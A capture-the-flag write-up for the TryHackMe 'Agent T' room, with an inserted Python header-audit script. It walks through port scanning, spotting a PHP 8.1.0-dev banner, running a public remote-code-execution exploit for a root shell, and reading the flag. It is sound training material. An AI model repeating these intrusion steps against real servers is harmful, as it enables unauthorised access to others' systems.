THM Writeup – Agent T

Something seems a little off with the server.

Room: Agent T

Difficulty: Easy

Operating System: Linux

Author: ben and JohnHammond and cmnatic and blacknote and timtaylor

Agent T uncovered this website, which looks innocent enough, but something seems off about how the server responds…

Add the target's IP address to your hosts file:

echo '10.10.184.35    agentt.thm' >> /etc/hosts

Scan the target machine – find open ports first:

nmap -n -Pn -sS -p- --open -min-rate 5000 -vvv agentt.thm

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack ttl 63

Get more details about open ports:

nmap -T4 -A -p 80 agentt.thm

PORT   STATE SERVICE VERSION
80/tcp open  http    PHP cli server 5.5 or later
|_http-title:  Admin Dashboard

Only one port is open: 80

Check the web application on port 80 – browse to http://agentt.thm

[Screenshot: Admin Dashboard]

The Admin Dashboard is accessible without authentication.

I looked at the admin dashboard, checked the page source – found nothing of interest. Then I opened the developer console (F12) and noticed an interesting value in the X-Powered-By header:

[Screenshot: Admin Dashboard - HTTP headers]

I found out this version of PHP is vulnerable to Remote Code Execution:

[Screenshot: php/8.1.0-dev exploit search results]
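The X-Powered-By value is what gave the version away, so the same check is useful from the defender's side. The following is an added example, not part of the original writeup or the exploit it references: it audits a raw HTTP response head for a PHP version banner and flags pre-release builds. The function names, the deny list and the sample responses are assumptions constructed for illustration.

```python
import re

# Banner the writeup observed and reported as vulnerable to RCE.
KNOWN_BAD = {"8.1.0-dev"}
# Suffixes PHP uses for non-release builds (dev snapshots, alpha/beta/RC).
PRERELEASE = re.compile(r"(-dev|alpha\d*|beta\d*|rc\d*)$", re.IGNORECASE)
PHP_BANNER = re.compile(r"PHP/(\S+)", re.IGNORECASE)

def parse_headers(raw: str) -> list[tuple[str, str]]:
    """Split a raw response head into (lowercased-name, value) pairs."""
    pairs = []
    for line in raw.splitlines()[1:]:        # skip the status line
        if not line.strip():
            break                            # blank line ends the header block
        name, sep, value = line.partition(":")
        if sep:
            pairs.append((name.strip().lower(), value.strip()))
    return pairs

def audit_php_banner(raw: str) -> list[str]:
    """Return findings for PHP version disclosure in response headers."""
    findings = []
    for name, value in parse_headers(raw):
        if name not in ("x-powered-by", "server"):
            continue
        match = PHP_BANNER.search(value)
        if not match:
            continue
        version = match.group(1)
        findings.append(f"disclosure: {name} exposes PHP {version} (set expose_php = Off)")
        if PRERELEASE.search(version):
            findings.append(f"prerelease: PHP {version} is not a release build")
        if version.lower() in KNOWN_BAD:
            findings.append(f"known-bad: PHP {version} is on the deny list")
    return findings

# Constructed sample responses (not captured from the target).
SAMPLE_VULN = (
    "HTTP/1.1 200 OK\r\n"
    "Host: agentt.thm\r\n"
    "x-powered-by: PHP/8.1.0-dev\r\n"
    "Content-type: text/html; charset=UTF-8\r\n\r\n<html>"
)
SAMPLE_CLEAN = "HTTP/1.1 200 OK\r\nServer: nginx\r\nContent-Type: text/html\r\n\r\n"

if __name__ == "__main__":
    for finding in audit_php_banner(SAMPLE_VULN):
        print(finding)
```

Setting expose_php = Off in php.ini removes the banner, but it only hides the version; a development build still has to be replaced with a release build.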

I copied the exploit from exploit-db.com, saved it to a file named exploit.py, made it executable and executed it – this gave me an interactive shell:

root@attackbox:~# nano exploit.py
root@attackbox:~# chmod +x exploit.py
root@attackbox:~# ./exploit.py 
Enter the full host url:
http://agentt.thm

Interactive shell is opened on http://agentt.thm 
Can't acces tty; job crontol turned off.
$ id
uid=0(root) gid=0(root) groups=0(root)

At this point I just looked around, found the flag and read it:

$ ls -la /root
total 16
drwx------ 2 root root 4096 Jan 11  2021 .
drwxr-xr-x 1 root root 4096 Mar  7 22:03 ..
-rw-r--r-- 1 root root  570 Jan 31  2010 .bashrc
-rw-r--r-- 1 root root  148 Aug 17  2015 .profile

$ ls -la /home
total 8
drwxr-xr-x 2 root root 4096 Nov 22  2020 .
drwxr-xr-x 1 root root 4096 Mar  7 22:03 ..

$ find / -type f -name flag.txt 2>/dev/null
/flag.txt

$ cat /flag.txt
flag{[REDACTED]}
